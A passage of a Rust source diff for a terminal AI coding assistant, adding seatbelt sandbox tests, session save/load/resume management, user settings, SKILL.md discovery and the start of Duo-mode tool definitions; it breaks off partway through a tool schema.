let result = generate_policy(&policy, cwd);
|
||||
|
||||
assert!(result.contains("(allow file-read*)"));
|
||||
// Should not have workspace write rules
|
||||
assert!(!result.contains("WRITABLE_ROOT"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_generate_params() {
|
||||
let policy = SandboxPolicy::default();
|
||||
let cwd = Path::new("/tmp/test");
|
||||
let params = generate_params(&policy, cwd);
|
||||
|
||||
// Should have at least the cache dir param
|
||||
assert!(params.iter().any(|(k, _)| k == "DARWIN_USER_CACHE_DIR"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_create_seatbelt_args() {
|
||||
let policy = SandboxPolicy::default();
|
||||
let cwd = Path::new("/tmp/test");
|
||||
let command = vec!["echo".to_string(), "hello".to_string()];
|
||||
|
||||
let args = create_seatbelt_args(command, &policy, cwd);
|
||||
|
||||
// Should start with -p and the policy
|
||||
assert_eq!(args[0], "-p");
|
||||
assert!(args[1].contains("(version 1)"));
|
||||
|
||||
// Should contain the separator
|
||||
assert!(args.contains(&"--".to_string()));
|
||||
|
||||
// Should end with the original command
|
||||
assert!(args.contains(&"echo".to_string()));
|
||||
assert!(args.contains(&"hello".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_detect_denial() {
|
||||
assert!(detect_denial(1, "Operation not permitted"));
|
||||
assert!(detect_denial(1, "Sandbox: ls denied file-write*"));
|
||||
assert!(!detect_denial(0, "Operation not permitted"));
|
||||
assert!(!detect_denial(1, "File not found"));
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,444 @@
|
||||
//! Session management for resuming conversations.
|
||||
//!
|
||||
//! This module provides functionality for:
|
||||
//! - Saving sessions to disk
|
||||
//! - Listing previous sessions
|
||||
//! - Resuming sessions by ID
|
||||
//! - Managing session lifecycle
|
||||
|
||||
#![allow(dead_code)] // Public API - session persistence functions for future TUI integration
|
||||
|
||||
use crate::models::{ContentBlock, Message, SystemPrompt};
|
||||
use chrono::{DateTime, Utc};
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
use uuid::Uuid;
|
||||
|
||||
/// Maximum number of sessions to retain
|
||||
const MAX_SESSIONS: usize = 50;
|
||||
|
||||
/// Session metadata stored with each saved session
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct SessionMetadata {
|
||||
/// Unique session identifier
|
||||
pub id: String,
|
||||
/// Human-readable title (derived from first message)
|
||||
pub title: String,
|
||||
/// When the session was created
|
||||
pub created_at: DateTime<Utc>,
|
||||
/// When the session was last updated
|
||||
pub updated_at: DateTime<Utc>,
|
||||
/// Number of messages in the session
|
||||
pub message_count: usize,
|
||||
/// Total tokens used
|
||||
pub total_tokens: u64,
|
||||
/// Model used for the session
|
||||
pub model: String,
|
||||
/// Workspace directory
|
||||
pub workspace: PathBuf,
|
||||
}
|
||||
|
||||
/// A saved session containing full conversation history
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct SavedSession {
|
||||
/// Session metadata
|
||||
pub metadata: SessionMetadata,
|
||||
/// Conversation messages
|
||||
pub messages: Vec<Message>,
|
||||
/// System prompt if any
|
||||
pub system_prompt: Option<String>,
|
||||
}
|
||||
|
||||
/// Manager for session persistence operations
|
||||
pub struct SessionManager {
|
||||
/// Directory where sessions are stored
|
||||
sessions_dir: PathBuf,
|
||||
}
|
||||
|
||||
impl SessionManager {
|
||||
/// Create a new `SessionManager` with the specified sessions directory
|
||||
pub fn new(sessions_dir: PathBuf) -> std::io::Result<Self> {
|
||||
// Ensure the sessions directory exists
|
||||
fs::create_dir_all(&sessions_dir)?;
|
||||
Ok(Self { sessions_dir })
|
||||
}
|
||||
|
||||
/// Create a `SessionManager` using the default location (~/.deepseek/sessions)
|
||||
pub fn default_location() -> std::io::Result<Self> {
|
||||
let home = dirs::home_dir().ok_or_else(|| {
|
||||
std::io::Error::new(std::io::ErrorKind::NotFound, "Home directory not found")
|
||||
})?;
|
||||
Self::new(home.join(".deepseek").join("sessions"))
|
||||
}
|
||||
|
||||
/// Save a session to disk
|
||||
pub fn save_session(&self, session: &SavedSession) -> std::io::Result<PathBuf> {
|
||||
let filename = format!("{}.json", session.metadata.id);
|
||||
let path = self.sessions_dir.join(&filename);
|
||||
|
||||
let content = serde_json::to_string_pretty(session)
|
||||
.map_err(|e| std::io::Error::new(std::io::ErrorKind::InvalidData, e))?;
|
||||
|
||||
fs::write(&path, content)?;
|
||||
|
||||
// Clean up old sessions if we have too many
|
||||
self.cleanup_old_sessions()?;
|
||||
|
||||
Ok(path)
|
||||
}
|
||||
|
||||
/// Load a session by ID
|
||||
pub fn load_session(&self, id: &str) -> std::io::Result<SavedSession> {
|
||||
let filename = format!("{id}.json");
|
||||
let path = self.sessions_dir.join(&filename);
|
||||
|
||||
let content = fs::read_to_string(&path)?;
|
||||
let session: SavedSession = serde_json::from_str(&content)
|
||||
.map_err(|e| std::io::Error::new(std::io::ErrorKind::InvalidData, e))?;
|
||||
|
||||
Ok(session)
|
||||
}
|
||||
|
||||
/// Load a session by partial ID prefix
|
||||
pub fn load_session_by_prefix(&self, prefix: &str) -> std::io::Result<SavedSession> {
|
||||
let sessions = self.list_sessions()?;
|
||||
|
||||
let matches: Vec<_> = sessions
|
||||
.into_iter()
|
||||
.filter(|s| s.id.starts_with(prefix))
|
||||
.collect();
|
||||
|
||||
match matches.len() {
|
||||
0 => Err(std::io::Error::new(
|
||||
std::io::ErrorKind::NotFound,
|
||||
format!("No session found with prefix: {prefix}"),
|
||||
)),
|
||||
1 => self.load_session(&matches[0].id),
|
||||
_ => Err(std::io::Error::new(
|
||||
std::io::ErrorKind::InvalidInput,
|
||||
format!(
|
||||
"Ambiguous prefix '{}' matches {} sessions",
|
||||
prefix,
|
||||
matches.len()
|
||||
),
|
||||
)),
|
||||
}
|
||||
}
|
||||
|
||||
/// List all saved sessions, sorted by most recently updated
|
||||
pub fn list_sessions(&self) -> std::io::Result<Vec<SessionMetadata>> {
|
||||
let mut sessions = Vec::new();
|
||||
|
||||
for entry in fs::read_dir(&self.sessions_dir)? {
|
||||
let entry = entry?;
|
||||
let path = entry.path();
|
||||
|
||||
if path.extension().is_some_and(|ext| ext == "json")
|
||||
&& let Ok(session) = Self::load_session_metadata(&path)
|
||||
{
|
||||
sessions.push(session);
|
||||
}
|
||||
}
|
||||
|
||||
// Sort by updated_at descending (most recent first)
|
||||
sessions.sort_by(|a, b| b.updated_at.cmp(&a.updated_at));
|
||||
|
||||
Ok(sessions)
|
||||
}
|
||||
|
||||
/// Load only the metadata from a session file (faster than loading full session)
|
||||
fn load_session_metadata(path: &Path) -> std::io::Result<SessionMetadata> {
|
||||
#[derive(Deserialize)]
|
||||
struct SavedSessionMetadata {
|
||||
metadata: SessionMetadata,
|
||||
}
|
||||
|
||||
let file = fs::File::open(path)?;
|
||||
let session: SavedSessionMetadata = serde_json::from_reader(file)
|
||||
.map_err(|e| std::io::Error::new(std::io::ErrorKind::InvalidData, e))?;
|
||||
Ok(session.metadata)
|
||||
}
|
||||
|
||||
/// Delete a session by ID
|
||||
pub fn delete_session(&self, id: &str) -> std::io::Result<()> {
|
||||
let filename = format!("{id}.json");
|
||||
let path = self.sessions_dir.join(&filename);
|
||||
fs::remove_file(path)
|
||||
}
|
||||
|
||||
/// Clean up old sessions to stay within `MAX_SESSIONS` limit
|
||||
fn cleanup_old_sessions(&self) -> std::io::Result<()> {
|
||||
let sessions = self.list_sessions()?;
|
||||
|
||||
if sessions.len() > MAX_SESSIONS {
|
||||
// Delete oldest sessions
|
||||
for session in sessions.iter().skip(MAX_SESSIONS) {
|
||||
let _ = self.delete_session(&session.id);
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Get the most recent session
|
||||
pub fn get_latest_session(&self) -> std::io::Result<Option<SessionMetadata>> {
|
||||
let sessions = self.list_sessions()?;
|
||||
Ok(sessions.into_iter().next())
|
||||
}
|
||||
|
||||
/// Search sessions by title
|
||||
pub fn search_sessions(&self, query: &str) -> std::io::Result<Vec<SessionMetadata>> {
|
||||
let query_lower = query.to_lowercase();
|
||||
let sessions = self.list_sessions()?;
|
||||
|
||||
Ok(sessions
|
||||
.into_iter()
|
||||
.filter(|s| s.title.to_lowercase().contains(&query_lower))
|
||||
.collect())
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new `SavedSession` from conversation state
|
||||
pub fn create_saved_session(
|
||||
messages: &[Message],
|
||||
model: &str,
|
||||
workspace: &Path,
|
||||
total_tokens: u64,
|
||||
system_prompt: Option<&SystemPrompt>,
|
||||
) -> SavedSession {
|
||||
let id = Uuid::new_v4().to_string();
|
||||
let now = Utc::now();
|
||||
|
||||
// Generate title from first user message
|
||||
let title = messages
|
||||
.iter()
|
||||
.find(|m| m.role == "user")
|
||||
.and_then(|m| {
|
||||
m.content.iter().find_map(|block| match block {
|
||||
ContentBlock::Text { text, .. } => Some(truncate_title(text, 50)),
|
||||
_ => None,
|
||||
})
|
||||
})
|
||||
.unwrap_or_else(|| "New Session".to_string());
|
||||
|
||||
SavedSession {
|
||||
metadata: SessionMetadata {
|
||||
id,
|
||||
title,
|
||||
created_at: now,
|
||||
updated_at: now,
|
||||
message_count: messages.len(),
|
||||
total_tokens,
|
||||
model: model.to_string(),
|
||||
workspace: workspace.to_path_buf(),
|
||||
},
|
||||
messages: messages.to_vec(),
|
||||
system_prompt: system_prompt_to_string(system_prompt),
|
||||
}
|
||||
}
|
||||
|
||||
/// Update an existing session with new messages
|
||||
pub fn update_session(
|
||||
mut session: SavedSession,
|
||||
messages: &[Message],
|
||||
total_tokens: u64,
|
||||
system_prompt: Option<&SystemPrompt>,
|
||||
) -> SavedSession {
|
||||
session.messages = messages.to_vec();
|
||||
session.metadata.updated_at = Utc::now();
|
||||
session.metadata.message_count = messages.len();
|
||||
session.metadata.total_tokens = total_tokens;
|
||||
session.system_prompt = system_prompt_to_string(system_prompt).or(session.system_prompt);
|
||||
session
|
||||
}
|
||||
|
||||
fn system_prompt_to_string(system_prompt: Option<&SystemPrompt>) -> Option<String> {
|
||||
match system_prompt {
|
||||
Some(SystemPrompt::Text(text)) => Some(text.clone()),
|
||||
Some(SystemPrompt::Blocks(blocks)) => Some(
|
||||
blocks
|
||||
.iter()
|
||||
.map(|b| b.text.clone())
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n\n---\n\n"),
|
||||
),
|
||||
None => None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Truncate a string to create a title
|
||||
fn truncate_title(s: &str, max_len: usize) -> String {
|
||||
let s = s.trim();
|
||||
let first_line = s.lines().next().unwrap_or(s);
|
||||
|
||||
if first_line.len() <= max_len {
|
||||
first_line.to_string()
|
||||
} else {
|
||||
format!("{}...", &first_line[..max_len - 3])
|
||||
}
|
||||
}
|
||||
|
||||
/// Format a session for display in a picker
|
||||
pub fn format_session_line(meta: &SessionMetadata) -> String {
|
||||
let age = format_age(&meta.updated_at);
|
||||
let truncated_title = truncate_title(&meta.title, 40);
|
||||
|
||||
format!(
|
||||
"{} | {} | {} msgs | {}",
|
||||
&meta.id[..8],
|
||||
truncated_title,
|
||||
meta.message_count,
|
||||
age
|
||||
)
|
||||
}
|
||||
|
||||
/// Format a datetime as relative age
|
||||
fn format_age(dt: &DateTime<Utc>) -> String {
|
||||
let now = Utc::now();
|
||||
let duration = now.signed_duration_since(*dt);
|
||||
|
||||
if duration.num_minutes() < 1 {
|
||||
"just now".to_string()
|
||||
} else if duration.num_hours() < 1 {
|
||||
format!("{}m ago", duration.num_minutes())
|
||||
} else if duration.num_days() < 1 {
|
||||
format!("{}h ago", duration.num_hours())
|
||||
} else if duration.num_weeks() < 1 {
|
||||
format!("{}d ago", duration.num_days())
|
||||
} else {
|
||||
format!("{}w ago", duration.num_weeks())
|
||||
}
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::models::ContentBlock;
|
||||
use tempfile::tempdir;
|
||||
|
||||
fn make_test_message(role: &str, text: &str) -> Message {
|
||||
Message {
|
||||
role: role.to_string(),
|
||||
content: vec![ContentBlock::Text {
|
||||
text: text.to_string(),
|
||||
cache_control: None,
|
||||
}],
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_session_manager_new() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let manager = SessionManager::new(tmp.path().join("sessions")).expect("new");
|
||||
assert!(tmp.path().join("sessions").exists());
|
||||
let _ = manager;
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_save_and_load_session() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let manager = SessionManager::new(tmp.path().join("sessions")).expect("new");
|
||||
|
||||
let messages = vec![
|
||||
make_test_message("user", "Hello!"),
|
||||
make_test_message("assistant", "Hi there!"),
|
||||
];
|
||||
|
||||
let session = create_saved_session(&messages, "test-model", tmp.path(), 100, None);
|
||||
let session_id = session.metadata.id.clone();
|
||||
|
||||
manager.save_session(&session).expect("save");
|
||||
|
||||
let loaded = manager.load_session(&session_id).expect("load");
|
||||
assert_eq!(loaded.metadata.id, session_id);
|
||||
assert_eq!(loaded.messages.len(), 2);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_list_sessions() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let manager = SessionManager::new(tmp.path().join("sessions")).expect("new");
|
||||
|
||||
// Create a few sessions
|
||||
for i in 0..3 {
|
||||
let messages = vec![make_test_message("user", &format!("Session {i}"))];
|
||||
let session = create_saved_session(&messages, "test-model", tmp.path(), 100, None);
|
||||
manager.save_session(&session).expect("save");
|
||||
}
|
||||
|
||||
let sessions = manager.list_sessions().expect("list");
|
||||
assert_eq!(sessions.len(), 3);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_load_by_prefix() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let manager = SessionManager::new(tmp.path().join("sessions")).expect("new");
|
||||
|
||||
let messages = vec![make_test_message("user", "Test session")];
|
||||
let session = create_saved_session(&messages, "test-model", tmp.path(), 100, None);
|
||||
let prefix = session.metadata.id[..8].to_string();
|
||||
manager.save_session(&session).expect("save");
|
||||
|
||||
let loaded = manager.load_session_by_prefix(&prefix).expect("load");
|
||||
assert_eq!(loaded.messages.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_delete_session() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let manager = SessionManager::new(tmp.path().join("sessions")).expect("new");
|
||||
|
||||
let messages = vec![make_test_message("user", "To be deleted")];
|
||||
let session = create_saved_session(&messages, "test-model", tmp.path(), 100, None);
|
||||
let session_id = session.metadata.id.clone();
|
||||
|
||||
manager.save_session(&session).expect("save");
|
||||
assert!(manager.load_session(&session_id).is_ok());
|
||||
|
||||
manager.delete_session(&session_id).expect("delete");
|
||||
assert!(manager.load_session(&session_id).is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_truncate_title() {
|
||||
assert_eq!(truncate_title("Short", 50), "Short");
|
||||
assert_eq!(
|
||||
truncate_title("This is a very long title that should be truncated", 20),
|
||||
"This is a very lo..."
|
||||
);
|
||||
assert_eq!(truncate_title("Line 1\nLine 2", 50), "Line 1");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_format_age() {
|
||||
let now = Utc::now();
|
||||
assert_eq!(format_age(&now), "just now");
|
||||
|
||||
let hour_ago = now - chrono::Duration::hours(2);
|
||||
assert_eq!(format_age(&hour_ago), "2h ago");
|
||||
|
||||
let day_ago = now - chrono::Duration::days(3);
|
||||
assert_eq!(format_age(&day_ago), "3d ago");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_update_session() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
|
||||
let messages = vec![make_test_message("user", "Hello")];
|
||||
let session = create_saved_session(&messages, "test-model", tmp.path(), 50, None);
|
||||
|
||||
let new_messages = vec![
|
||||
make_test_message("user", "Hello"),
|
||||
make_test_message("assistant", "Hi!"),
|
||||
];
|
||||
|
||||
let updated = update_session(session, &new_messages, 100, None);
|
||||
assert_eq!(updated.messages.len(), 2);
|
||||
assert_eq!(updated.metadata.total_tokens, 100);
|
||||
}
|
||||
}
|
||||
+208
@@ -0,0 +1,208 @@
|
||||
//! Settings system - Persistent user preferences
|
||||
//!
|
||||
//! Settings are stored at ~/.config/deepseek/settings.toml
|
||||
|
||||
use std::path::PathBuf;
|
||||
|
||||
use anyhow::{Context, Result};
|
||||
use serde::{Deserialize, Serialize};
|
||||
|
||||
/// User settings with defaults
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(default)]
|
||||
pub struct Settings {
|
||||
/// Color theme: "default", "dark", "light"
|
||||
pub theme: String,
|
||||
/// Auto-compact conversations when they get long
|
||||
pub auto_compact: bool,
|
||||
/// Show thinking blocks from the model
|
||||
pub show_thinking: bool,
|
||||
/// Show detailed tool output
|
||||
pub show_tool_details: bool,
|
||||
/// Default mode: "agent", "plan", "yolo", "rlm", "duo"
|
||||
pub default_mode: String,
|
||||
/// Sidebar width as percentage of terminal width
|
||||
pub sidebar_width_percent: u16,
|
||||
/// Maximum number of input history entries to save
|
||||
pub max_input_history: usize,
|
||||
/// Default model to use
|
||||
pub default_model: Option<String>,
|
||||
}
|
||||
|
||||
impl Default for Settings {
|
||||
fn default() -> Self {
|
||||
Self {
|
||||
theme: "default".to_string(),
|
||||
auto_compact: true,
|
||||
show_thinking: true,
|
||||
show_tool_details: true,
|
||||
default_mode: "agent".to_string(),
|
||||
sidebar_width_percent: 28,
|
||||
max_input_history: 100,
|
||||
default_model: None,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
impl Settings {
|
||||
/// Get the settings file path
|
||||
pub fn path() -> Result<PathBuf> {
|
||||
let config_dir = dirs::config_dir()
|
||||
.context("Failed to resolve config directory: not found.")?
|
||||
.join("deepseek");
|
||||
Ok(config_dir.join("settings.toml"))
|
||||
}
|
||||
|
||||
/// Load settings from disk, or return defaults if not found
|
||||
pub fn load() -> Result<Self> {
|
||||
let path = Self::path()?;
|
||||
if !path.exists() {
|
||||
return Ok(Self::default());
|
||||
}
|
||||
|
||||
let content = std::fs::read_to_string(&path)
|
||||
.with_context(|| format!("Failed to read settings from {}", path.display()))?;
|
||||
let mut settings: Settings = toml::from_str(&content)
|
||||
.with_context(|| format!("Failed to parse settings from {}", path.display()))?;
|
||||
settings.default_mode = normalize_mode(&settings.default_mode).to_string();
|
||||
Ok(settings)
|
||||
}
|
||||
|
||||
/// Save settings to disk
|
||||
pub fn save(&self) -> Result<()> {
|
||||
let path = Self::path()?;
|
||||
|
||||
// Create config directory if it doesn't exist
|
||||
if let Some(parent) = path.parent() {
|
||||
std::fs::create_dir_all(parent).with_context(|| {
|
||||
format!("Failed to create config directory {}", parent.display())
|
||||
})?;
|
||||
}
|
||||
|
||||
let content = toml::to_string_pretty(self).context("Failed to serialize settings")?;
|
||||
std::fs::write(&path, content)
|
||||
.with_context(|| format!("Failed to write settings to {}", path.display()))?;
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Set a single setting by key
|
||||
pub fn set(&mut self, key: &str, value: &str) -> Result<()> {
|
||||
match key {
|
||||
"theme" => {
|
||||
if !["default", "dark", "light"].contains(&value) {
|
||||
anyhow::bail!(
|
||||
"Failed to update setting: invalid theme '{value}'. Expected: default, dark, light."
|
||||
);
|
||||
}
|
||||
self.theme = value.to_string();
|
||||
}
|
||||
"auto_compact" | "compact" => {
|
||||
self.auto_compact = parse_bool(value)?;
|
||||
}
|
||||
"show_thinking" | "thinking" => {
|
||||
self.show_thinking = parse_bool(value)?;
|
||||
}
|
||||
"show_tool_details" | "tool_details" => {
|
||||
self.show_tool_details = parse_bool(value)?;
|
||||
}
|
||||
"default_mode" | "mode" => {
|
||||
let normalized = normalize_mode(value);
|
||||
if !["agent", "plan", "yolo", "rlm", "duo"].contains(&normalized) {
|
||||
anyhow::bail!(
|
||||
"Failed to update setting: invalid mode '{value}'. Expected: agent, plan, yolo, rlm, duo."
|
||||
);
|
||||
}
|
||||
self.default_mode = normalized.to_string();
|
||||
}
|
||||
"sidebar_width" | "sidebar" => {
|
||||
let width: u16 = value
|
||||
.parse()
|
||||
.map_err(|_| {
|
||||
anyhow::anyhow!(
|
||||
"Failed to update setting: invalid width '{value}'. Expected a number between 10-50."
|
||||
)
|
||||
})?;
|
||||
if !(10..=50).contains(&width) {
|
||||
anyhow::bail!(
|
||||
"Failed to update setting: width must be between 10 and 50 percent."
|
||||
);
|
||||
}
|
||||
self.sidebar_width_percent = width;
|
||||
}
|
||||
"max_history" | "history" => {
|
||||
let max: usize = value.parse().map_err(|_| {
|
||||
anyhow::anyhow!(
|
||||
"Failed to update setting: invalid max history '{value}'. Expected a positive number."
|
||||
)
|
||||
})?;
|
||||
self.max_input_history = max;
|
||||
}
|
||||
"default_model" | "model" => {
|
||||
self.default_model = Some(value.to_string());
|
||||
}
|
||||
_ => {
|
||||
anyhow::bail!("Failed to update setting: unknown setting '{key}'.");
|
||||
}
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Get all settings as a displayable string
|
||||
pub fn display(&self) -> String {
|
||||
let mut lines = Vec::new();
|
||||
lines.push("Settings:".to_string());
|
||||
lines.push("─────────────────────────────".to_string());
|
||||
lines.push(format!(" theme: {}", self.theme));
|
||||
lines.push(format!(" auto_compact: {}", self.auto_compact));
|
||||
lines.push(format!(" show_thinking: {}", self.show_thinking));
|
||||
lines.push(format!(" show_tool_details: {}", self.show_tool_details));
|
||||
lines.push(format!(" default_mode: {}", self.default_mode));
|
||||
lines.push(format!(
|
||||
" sidebar_width: {}%",
|
||||
self.sidebar_width_percent
|
||||
));
|
||||
lines.push(format!(" max_history: {}", self.max_input_history));
|
||||
lines.push(format!(
|
||||
" default_model: {}",
|
||||
self.default_model.as_deref().unwrap_or("(default)")
|
||||
));
|
||||
lines.push(String::new());
|
||||
lines.push(format!(
|
||||
"Config file: {}",
|
||||
Self::path().map_or_else(|_| "(unknown)".to_string(), |p| p.display().to_string())
|
||||
));
|
||||
lines.join("\n")
|
||||
}
|
||||
|
||||
/// Get available setting keys and their descriptions
|
||||
pub fn available_settings() -> Vec<(&'static str, &'static str)> {
|
||||
vec![
|
||||
("theme", "Color theme: default, dark, light"),
|
||||
("auto_compact", "Auto-compact conversations: on/off"),
|
||||
("show_thinking", "Show model thinking: on/off"),
|
||||
("show_tool_details", "Show detailed tool output: on/off"),
|
||||
("default_mode", "Default mode: agent, plan, yolo, rlm, duo"),
|
||||
("sidebar_width", "Sidebar width percentage: 10-50"),
|
||||
("max_history", "Max input history entries"),
|
||||
("default_model", "Default model name"),
|
||||
]
|
||||
}
|
||||
}
|
||||
|
||||
/// Parse a boolean value from various formats
|
||||
fn parse_bool(value: &str) -> Result<bool> {
|
||||
match value.to_lowercase().as_str() {
|
||||
"on" | "true" | "yes" | "1" | "enabled" => Ok(true),
|
||||
"off" | "false" | "no" | "0" | "disabled" => Ok(false),
|
||||
_ => {
|
||||
anyhow::bail!("Failed to parse boolean '{value}': expected on/off, true/false, yes/no.")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn normalize_mode(value: &str) -> &str {
|
||||
match value {
|
||||
"edit" | "normal" => "agent",
|
||||
_ => value,
|
||||
}
|
||||
}
|
||||
+154
@@ -0,0 +1,154 @@
|
||||
//! Skill discovery and registry for local SKILL.md files.
|
||||
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
|
||||
use anyhow::{Context, Result};
|
||||
|
||||
// === Defaults ===
|
||||
|
||||
#[allow(dead_code)]
|
||||
#[must_use]
|
||||
pub fn default_skills_dir() -> PathBuf {
|
||||
dirs::home_dir().map_or_else(
|
||||
|| PathBuf::from("/tmp/deepseek/skills"),
|
||||
|p| p.join(".deepseek").join("skills"),
|
||||
)
|
||||
}
|
||||
|
||||
// === Types ===
|
||||
|
||||
/// Parsed representation of a SKILL.md definition.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct Skill {
|
||||
pub name: String,
|
||||
pub description: String,
|
||||
pub body: String,
|
||||
}
|
||||
|
||||
/// Collection of discovered skills.
|
||||
#[derive(Debug, Clone, Default)]
|
||||
pub struct SkillRegistry {
|
||||
skills: Vec<Skill>,
|
||||
}
|
||||
|
||||
impl SkillRegistry {
|
||||
/// Discover skills from the given directory.
|
||||
#[must_use]
|
||||
pub fn discover(dir: &Path) -> Self {
|
||||
let mut registry = Self::default();
|
||||
if !dir.exists() {
|
||||
return registry;
|
||||
}
|
||||
|
||||
if let Ok(entries) = fs::read_dir(dir) {
|
||||
for entry in entries.flatten() {
|
||||
if let Ok(ft) = entry.file_type()
|
||||
&& ft.is_dir()
|
||||
{
|
||||
let skill_path = entry.path().join("SKILL.md");
|
||||
if let Ok(content) = fs::read_to_string(&skill_path)
|
||||
&& let Some(skill) = Self::parse_skill(&skill_path, &content)
|
||||
{
|
||||
registry.skills.push(skill);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
registry
|
||||
}
|
||||
|
||||
fn parse_skill(_path: &Path, content: &str) -> Option<Skill> {
|
||||
let trimmed = content.trim_start();
|
||||
let (frontmatter, body) = if trimmed.starts_with("---") {
|
||||
let start = content.find("---")?;
|
||||
let rest = &content[start + 3..];
|
||||
let end = rest.find("---")?;
|
||||
(&rest[..end], &rest[end + 3..])
|
||||
} else {
|
||||
let frontmatter_end = content.find("---")?;
|
||||
(&content[..frontmatter_end], &content[frontmatter_end + 3..])
|
||||
};
|
||||
let name = frontmatter
|
||||
.lines()
|
||||
.find(|l| l.starts_with("name:"))
|
||||
.and_then(|l| l.split(':').nth(1))?
|
||||
.trim()
|
||||
.to_string();
|
||||
|
||||
let description = frontmatter
|
||||
.lines()
|
||||
.find(|l| l.starts_with("description:"))
|
||||
.and_then(|l| l.split(':').nth(1))
|
||||
.map(|s| s.trim().to_string())
|
||||
.unwrap_or_default();
|
||||
|
||||
let body = body.trim().to_string();
|
||||
|
||||
Some(Skill {
|
||||
name,
|
||||
description,
|
||||
body,
|
||||
})
|
||||
}
|
||||
|
||||
/// Lookup a skill by name.
|
||||
pub fn get(&self, name: &str) -> Option<&Skill> {
|
||||
self.skills.iter().find(|s| s.name == name)
|
||||
}
|
||||
|
||||
/// Return all loaded skills.
|
||||
pub fn list(&self) -> &[Skill] {
|
||||
&self.skills
|
||||
}
|
||||
|
||||
/// Check whether any skills were loaded.
|
||||
#[must_use]
|
||||
pub fn is_empty(&self) -> bool {
|
||||
self.skills.is_empty()
|
||||
}
|
||||
|
||||
/// Return the number of loaded skills.
|
||||
#[must_use]
|
||||
pub fn len(&self) -> usize {
|
||||
self.skills.len()
|
||||
}
|
||||
}
|
||||
|
||||
// === CLI Helpers ===
|
||||
|
||||
#[allow(dead_code)] // CLI utility for future use
|
||||
pub fn list(skills_dir: &Path) -> Result<()> {
|
||||
if !skills_dir.exists() {
|
||||
println!("No skills directory found at {}", skills_dir.display());
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let mut entries = Vec::new();
|
||||
for entry in fs::read_dir(skills_dir)? {
|
||||
let entry = entry?;
|
||||
if entry.file_type()?.is_dir() {
|
||||
entries.push(entry.file_name().to_string_lossy().to_string());
|
||||
}
|
||||
}
|
||||
|
||||
if entries.is_empty() {
|
||||
println!("No skills found in {}", skills_dir.display());
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
entries.sort();
|
||||
for entry in entries {
|
||||
println!("{entry}");
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[allow(dead_code)] // CLI utility for future use
|
||||
pub fn show(skills_dir: &Path, name: &str) -> Result<()> {
|
||||
let path = skills_dir.join(name).join("SKILL.md");
|
||||
let contents =
|
||||
fs::read_to_string(&path).with_context(|| format!("Failed to read {}", path.display()))?;
|
||||
println!("{contents}");
|
||||
Ok(())
|
||||
}
|
||||
@@ -0,0 +1,468 @@
|
||||
//! Tools for Duo mode: Player-Coach autocoding workflow.
|
||||
|
||||
use async_trait::async_trait;
|
||||
use serde_json::{Value, json};
|
||||
|
||||
use crate::duo::{
|
||||
DuoPhase, SharedDuoSession, generate_coach_prompt, generate_player_prompt, session_summary,
|
||||
};
|
||||
use crate::tools::spec::{
|
||||
ApprovalRequirement, ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec,
|
||||
optional_str, required_str,
|
||||
};
|
||||
|
||||
/// Initialize an autocoding session with requirements.
|
||||
pub struct DuoInitTool {
|
||||
session: SharedDuoSession,
|
||||
}
|
||||
|
||||
impl DuoInitTool {
|
||||
#[must_use]
|
||||
pub fn new(session: SharedDuoSession) -> Self {
|
||||
Self { session }
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for DuoInitTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"duo_init"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Initialize a Duo autocoding session with requirements. Returns session summary."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"requirements": {
|
||||
"type": "string",
|
||||
"description": "The requirements document (source of truth). Should be structured as a checklist."
|
||||
},
|
||||
"max_turns": {
|
||||
"type": "integer",
|
||||
"description": "Maximum turns before timeout (default: 10)"
|
||||
},
|
||||
"session_name": {
|
||||
"type": "string",
|
||||
"description": "Optional human-readable session name (e.g., 'auth-feature')"
|
||||
},
|
||||
"approval_threshold": {
|
||||
"type": "number",
|
||||
